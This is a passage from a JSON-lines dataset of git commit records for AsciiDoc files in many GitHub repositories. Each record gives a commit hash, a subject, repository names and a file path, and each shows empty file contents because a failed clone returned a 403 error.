2019-02-27-Rancher-E-K-S-R-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_file":"_posts\/2019-02-27-Rancher-E-K-S-R-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77adb6ce61adf3ae53760db143df72bb1401d292","subject":"Grammatical fixes","message":"Grammatical fixes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"306651a308ecc355c1aa1728b3059d6fad84b624","subject":"remove extra \\","message":"remove extra \\\n","repos":"ato\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool","old_file":"tool\/yubico-piv-tool.adoc","new_file":"tool\/yubico-piv-tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"32dbe462dbc7575c277d014befd49d4a42705f42","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3747055d207af55939e9c3a87f8630bbd6912b76","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350cb0aa484b4bea0c0e7476bbf266872cd8fcd6","subject":"Update 2016-05-19-Gradle-and-Kotlin.adoc","message":"Update 2016-05-19-Gradle-and-Kotlin.adoc","repos":"benignbala\/benignbala.hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/hubpress.io,benignbala\/benignbala.hubpress.io","old_file":"_posts\/2016-05-19-Gradle-and-Kotlin.adoc","new_file":"_posts\/2016-05-19-Gradle-and-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/benignbala.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dad28552f5eea7c1c45f1866f1417794dc49a65","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64f3405e5fe37956f721c3d8b548a8f86145bdeb","subject":"Installation doc in asciidoc format","message":"Installation doc in asciidoc format\n","repos":"imadLamari\/carto_teach_planning,imadLamari\/carto_teach_planning","old_file":"docs\/install.adoc","new_file":"docs\/install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imadLamari\/carto_teach_planning.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1e6723c4bc307a84066c89c73e6595692b5a013","subject":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93c64ca6fa85a54cf9e12cb0131608cfdcc6b571","subject":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","message":"Update 2015-08-14-MEGA-Link-Downloader-FAQ.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_file":"_posts\/2015-08-14-MEGA-Link-Downloader-FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"daf198095d717a85235d7c8a4ed69d2cb5947b7d","subject":"Update 2017-05-26-Guards-guards-in-haskell.adoc","message":"Update 2017-05-26-Guards-guards-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-26-Guards-guards-in-haskell.adoc","new_file":"_posts\/2017-05-26-Guards-guards-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8165dd9cfba1ec369a081e85803831b42a28abfb","subject":"Update 2017-10-15-First-tip-find-your-HOME.adoc","message":"Update 2017-10-15-First-tip-find-your-HOME.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-15-First-tip-find-your-HOME.adoc","new_file":"_posts\/2017-10-15-First-tip-find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a8979bd542706094c25881fe7602c4c90f8d49d","subject":"Update 2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","message":"Update 2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","new_file":"_posts\/2017-03-17-Dogmatisch-Scholastisch-Spekulativ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f733bd42283cf3547eec79e53611a2995713bd8","subject":"Update 2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","message":"Update 2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","new_file":"_posts\/2017-04-06-Arrivo-al-Castello-Alcuni-incontri.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0828ebb2e73ce5a7900fbb031e163752c0bf6514","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"699050d0551950e29bb2ed99395373ac0ef64550","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4845bc095b0169aeab5d9f1d6d3e85ab33e50c9","subject":"The nexus.png image should not be inline - was creating a folder called \":images\"","message":"The nexus.png image should not be inline - was creating a folder called \":images\"\n\nOriginal commit: elastic\/x-pack-elasticsearch@f935e44b042bb7a924c8cafb1abf53e021f53929\n","repos":"uschindler\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,gfyoung\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19e8c6fa9d3f14d74b6c780b1c0cca071d4001f9","subject":"Add article: Steins;Git\u3092C86(\u30b3\u30df\u30c3\u30af\u30de\u30fc\u30b1\u30c3\u30c886)\u306b\u3066\u9812\u5e03\u3057\u307e\u3059","message":"Add article: Steins;Git\u3092C86(\u30b3\u30df\u30c3\u30af\u30de\u30fc\u30b1\u30c3\u30c886)\u306b\u3066\u9812\u5e03\u3057\u307e\u3059\n","repos":"o2project\/blog.o2p.jp,o2project\/blog.o2p.jp,o2project\/blog.o2p.jp","old_file":"source\/archives\/2014-07-22-c86-steins-git.adoc","new_file":"source\/archives\/2014-07-22-c86-steins-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/o2project\/blog.o2p.jp.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f70cfd25ef6138097219d9328105b0ce03862112","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faef5be3f6530e65904c04cb68027ef0b402e892","subject":"Update 2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","message":"Update 2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","new_file":"_posts\/2016-01-28-Minimal-Centos-7-Image-with-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73f901870f412e6c22e253499146f117c119a170","subject":"Renamed '_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc' to '_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc'","message":"Renamed '_posts\/2018-03-25-Microservices-in-the-Chronicle-world-Part-1.adoc' to '_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc'","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc","new_file":"_posts\/2016-03-23-Microservices-in-the-Chronicle-world-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7344b0071e10d80b939fca855741aed92c85edd","subject":"Some reasons","message":"Some reasons\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Local design.adoc","new_file":"Best practices\/Local design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3695a8474fc19ab08e692b5ead4c4f4f9a57cca","subject":"README.adoc addition","message":"README.adoc addition\n","repos":"vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples,vert-x3\/vertx-examples","old_file":"junit5-examples\/README.adoc","new_file":"junit5-examples\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91b8eab02700de505141053191f795afd93e1275","subject":"Clarify some configuration in documentation","message":"Clarify some configuration in documentation\n\nSome of the examples used to illustrate multi-git configuration\nare apparently confusing. This change adds some clarification.\n\nFixes gh-213\n","repos":"fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,mstine\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,fkissel\/spring-cloud-config,mbenson\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,appleman\/spring-cloud-config,royclarkson\/spring-cloud-config,royclarkson\/spring-cloud-config,shakuzen\/spring-cloud-config,mbenson\/spring-cloud-config,fkissel\/spring-cloud-config,fangjing828\/spring-cloud-config,shakuzen\/spring-cloud-config,royclarkson\/spring-cloud-config,mstine\/spring-cloud-config,rajkumargithub\/spring-cloud-config,appleman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,thomasdarimont\/spring-cloud-config,thomasdarimont\/spring-cloud-config,psbateman\/spring-cloud-config,fangjing828\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,mstine\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e6f204622cf046eb63b11880671be4906d45089","subject":"Minor edits to styleguide","message":"Minor edits to styleguide","repos":"Onager\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts,Onager\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"946271feb337c064a8b3f38e5aca26be3c99b81d","subject":"Update 2016-04-16-Hub-Press.adoc","message":"Update 2016-04-16-Hub-Press.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Hub-Press.adoc","new_file":"_posts\/2016-04-16-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efd93b597dece3058e251e0615a161ed6f044967","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"015cb2156d6da0345be02cd0cbb3b61f2ba79e4c","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5955f9b031137742727610b3cf8a7c184f16c316","subject":"Update 2015-09-10-Ruby-on-Rails-Bootstrap.adoc","message":"Update 2015-09-10-Ruby-on-Rails-Bootstrap.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-09-10-Ruby-on-Rails-Bootstrap.adoc","new_file":"_posts\/2015-09-10-Ruby-on-Rails-Bootstrap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cc6896f8975d292b5bfc7c064974ddfaa85a28b","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd4ff551faec50066d6d5eb74c21c5a7201c0765","subject":"Update 2016-04-03-Houdini-material-override.adoc","message":"Update 2016-04-03-Houdini-material-override.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-04-03-Houdini-material-override.adoc","new_file":"_posts\/2016-04-03-Houdini-material-override.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26abc90d8e324a4d0f675999ebbc08b9ca1cb670","subject":"Adding 1.3 Beta2 release announcement","message":"Adding 1.3 Beta2 release announcement\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-09-16-debezium-1-3-beta2-released.adoc","new_file":"blog\/2020-09-16-debezium-1-3-beta2-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3d80ce5f8e8917dad1f7c260c869e472fa6fcc2c","subject":"Add a basic FAQ","message":"Add a basic FAQ\n","repos":"jkonecny12\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,casimir\/kakoune,alexherbo2\/kakoune,danr\/kakoune,casimir\/kakoune,flavius\/kakoune,lenormf\/kakoune,lenormf\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,ekie\/kakoune,occivink\/kakoune,danr\/kakoune,Somasis\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,ekie\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,flavius\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,danr\/kakoune,occivink\/kakoune,lenormf\/kakoune,danr\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,ekie\/kakoune,mawww\/kakoune,occivink\/kakoune,ekie\/kakoune,occivink\/kakoune","old_file":"doc\/manpages\/faq.asciidoc","new_file":"doc\/manpages\/faq.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"1eafbc24381bd179133de50d4e2303750148fe1f","subject":"Move repo clone after authentication","message":"Move repo clone after authentication","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"6e9bbdc91c134be0ebe29f594f7acf500b1671c0","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a462b6afc7b09ad5a5acd0beb72822ff8a700cc","subject":"y2b create post DON'T Buy This \\","message":"y2b create post DON'T Buy This \\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-14-DONT-Buy-This-.adoc","new_file":"_posts\/2017-09-14-DONT-Buy-This-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"894ef5c78be57542928e84ec45f6c516095e2486","subject":"Update 2018-07-07-cookie-custard.adoc","message":"Update 2018-07-07-cookie-custard.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-07-cookie-custard.adoc","new_file":"_posts\/2018-07-07-cookie-custard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aec10808eb1c14086737f16888edf9201af603b","subject":"Update changelog","message":"Update changelog\n","repos":"rumpelsepp\/pynote","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"907dbe82c4cafa89624d4727564480694b9335b9","subject":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","message":"Update 2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87cf1f3c1915b3b8c0619cae2f55a479c395add0","subject":"Update 2016-12-06-problem-solving-C.adoc","message":"Update 2016-12-06-problem-solving-C.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-C.adoc","new_file":"_posts\/2016-12-06-problem-solving-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1dd1eaf6377b6d5383829b3174fd0c1f123d8b8","subject":"Update 2017-11-28-Cisco-Phone-Setup.adoc","message":"Update 2017-11-28-Cisco-Phone-Setup.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-28-Cisco-Phone-Setup.adoc","new_file":"_posts\/2017-11-28-Cisco-Phone-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6cc7178e10c83cf675c6719f549c3b469e2927a6","subject":"Hiring blogpost","message":"Hiring 